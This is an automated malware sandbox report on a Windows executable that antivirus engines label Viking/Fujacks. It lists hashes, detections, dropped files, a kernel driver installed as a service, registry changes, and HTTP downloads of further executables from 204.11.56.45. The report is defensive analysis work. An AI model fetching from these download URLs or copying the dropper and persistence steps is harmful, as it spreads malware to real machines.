Analysis Date: 2015-02-01 12:49:07
MD5: 46a44eb0c26fa16edd77f1d67b3012bc
SHA1: 56b7e4d84be81463149a52a52f596e175e8e1334

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section: .text, md5: 543c472fb747a2f81b6c84c3848f5c0e, sha1: 085b9fe590f0f20153b1d70d1f95563db2632575, size: 90112
Section: .rdata, md5: 16cefbcab73e2a4f926ecf5629491e1a, sha1: 23bd5dba5d8376ac6b2f2c82c7f375f9c92bcc05, size: 24576
Section: .data, md5: f60d59ab0e05ad55771a5e8a05fd580b, sha1: 8a0fbf7dbdf3f604bea6ec23060fe922421aed58, size: 8192
Section: .rsrc, md5: ee68a26e0bd3388aabad9b15b2bdc7e6, sha1: 01efc953b7c36e2117c83809e91cb16e10bd2299, size: 24576
Section: .tcE, md5: 8de3345e6f95cbf34cbc6503e70dd6c7, sha1: 0614301071b4602b424e8c0f2c4b6c67fd51572c, size: 28672
Timestamp: 2006-08-22 11:01:08
Version:
LegalCopyright: VentonSoft 版权所有 (C) 2006
InternalName: Startup
FileVersion: 1, 0, 0, 1
ProductName: Startup 应用程序
ProductVersion: 1, 0, 0, 1
FileDescription: Startup Microsoft 基础类应用程序
OriginalFilename: Startup.EXE
PEhash: 20b4f9be7dae302b28c61eec8c5c398a75a3a939
IMPhash: fc3c4a62c317db534b9657097c19cffc
AV: 360 Safe - Virus.Win32.Agent.O
AV: Ad-Aware - Win32.Viking.AR
AV: Alwil (avast) - Viking-CF:Win32:Viking-CF
AV: Arcabit (arcavir) - Win32.Viking.AR
AV: Authentium - W32/Viking.A.gen!Eldorado
AV: Avira (antivir) - W32/Fujacks.DR
AV: BullGuard - Win32.Viking.AR
AV: CA (E-Trust Ino) - Win32/Viking.D
AV: CAT (quickheal) - W32.Agent.DP
AV: ClamAV - Worm.Fujack-55
AV: Dr. Web - Win32.HLLW.Autoruner.8224
AV: Emsisoft - Win32.Viking.AR
AV: Eset (nod32) - Win32/Agent.DP virus
AV: Fortinet - W32/Fujacks.BF!tr
AV: Frisk (f-prot) - W32/Viking.A.gen!Eldorado
AV: F-Secure - Win32.Viking.AR
AV: Grisoft (avg) - Win32/Fujacks.S
AV: Ikarus - Trojan-Downloader.Win32.Jadtre
AV: K7 - Virus ( 00108a531 )
AV: Kaspersky - Virus.Win32.Agent.dp
AV: MalwareBytes - no_virus
AV: Mcafee - W32/Fujacks.ay
AV: Microsoft Security Essentials - Virus:Win32/Viking.NK
AV: MicroWorld (escan) - Win32.Viking.AR
AV: Rising - Win32.Agent.hn
AV: Sophos - W32/FuzVir-A
AV: Symantec - W32.Loorp.A!inf
AV: Trend Micro - PE_JEEFO.D
AV: VirusBlokAda (vba32) - Virus.Win32.Koklek

Runtime Details:

Process
↳ C:\malware.exe

Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\Expor.exe
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\Expor.exe

Process
↳ "C:\Documents and Settings\Administrator\Local Settings\Temp\Loopt.bat"

Creates File: C:\WINDOWS\system32\dllcache\lsasvc.dll
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temp\Loopt.bat
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temp\Expor.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\Expor.exe

Creates File: PIPE\SfcApi
Creates File: PIPE\wkssvc
Creates File: C:\WINDOWS\system32\qmgr.dll
Creates File: C:\WINDOWS\system32\mspmsnsv.dll
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\Loopt.bat
Creates Process: "C:\Documents and Settings\Administrator\Local Settings\Temp\Loopt.bat"
Starts Service: WmdmPmSN

Process
↳ C:\WINDOWS\system32\svchost.exe

Process
↳ Pid 808

Process
↳ Pid 856

Process
↳ C:\WINDOWS\System32\svchost.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ NULL
Registry: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WmdmPmSN\Start ➝ 2
Registry: HKEY_LOCAL_MACHINE\Software\Microsoft\WBEM\CIMOM\List of event-active namespaces ➝ NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝ 1
Creates File: PIPE\DAV RPC SERVICE
Creates File: C:\WINDOWS\system32\drivers\etc\hosts
Creates File: C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\49I3WDU3\desktop.ini
Creates File: NtHid
Creates File: C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates File: C:\WINDOWS\system32\WBEM\Repository\$WinMgmt.CFG
Creates File: C:\Documents and Settings\NetworkService\Cookies\index.dat
Creates File: C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\2FAD4H8P\desktop.ini
Creates File: \Device\Afd\AsyncConnectHlp
Creates File: C:\Documents and Settings\NetworkService\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\T1G8NVWY\desktop.ini
Creates File: PIPE\wkssvc
Creates File: C:\malware.exe
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: C:\WINDOWS\TEMP\NtHid.sys
Creates File: C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\4KLJ86GH\desktop.ini
Creates File: C:\WINDOWS\system32\WBEM\Logs\wbemess.log
Deletes File: C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\D4Z32ED8\desktop.ini
Deletes File: C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\desktop.ini
Deletes File: C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\IIQ3LGTM\desktop.ini
Deletes File: C:\WINDOWS\TEMP\NtHid.sys
Deletes File: C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\BSDHA97U\desktop.ini
Creates Mutex: c:!documents and settings!networkservice!local settings!history!history.ie5!
Creates Mutex: c:!documents and settings!networkservice!cookies!
Creates Mutex: c:!documents and settings!networkservice!local settings!temporary internet files!content.ie5!
Creates Service: NtHid - C:\WINDOWS\TEMP\NtHid.sys
Winsock DNS: 204.11.56.45
Winsock DNS: 192.168.1.1
Winsock DNS: www.490a-B8B5-9B8C1E870B0C.com
Winsock DNS: www.baidu.com
Winsock DNS: pc1.114central.com

Process
↳ Pid 1112

Process
↳ C:\WINDOWS\system32\spoolsv.exe

Registry: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Print\BeepEnabled ➝ NULL
Registry: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\Print\TypesSupported ➝ 7
Registry: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Print\Printers\SymbolicLinkValue ➝ NULL
Registry: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Print\Printers\DefaultSpoolDirectory ➝ C:\WINDOWS\System32\spool\PRINTERS\\x00
Creates File: WMIDataDevice

Process
↳ Pid 1852

Process
↳ Pid 1148

Network Details:

DNS: www.a.shifen.com
Type: A
180.76.3.151
DNS: pc1.114central.com
Type: A
204.11.56.45
DNS: nbtj.114anhui.com
Type: A
DNS: www.baidu.com
Type: A
DNS: www.490a-B8B5-9B8C1E870B0C.com
Type: A
HTTP GET: http://204.11.56.45/nbok01/dnfTT.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://204.11.56.45/nbok01/tlTT.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://204.11.56.45/nbok01/RXCQTT.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP: 192.168.1.1:1032 ➝ 204.11.56.45:80
Flows TCP: 192.168.1.1:1033 ➝ 204.11.56.45:80
Flows TCP: 192.168.1.1:1034 ➝ 204.11.56.45:80
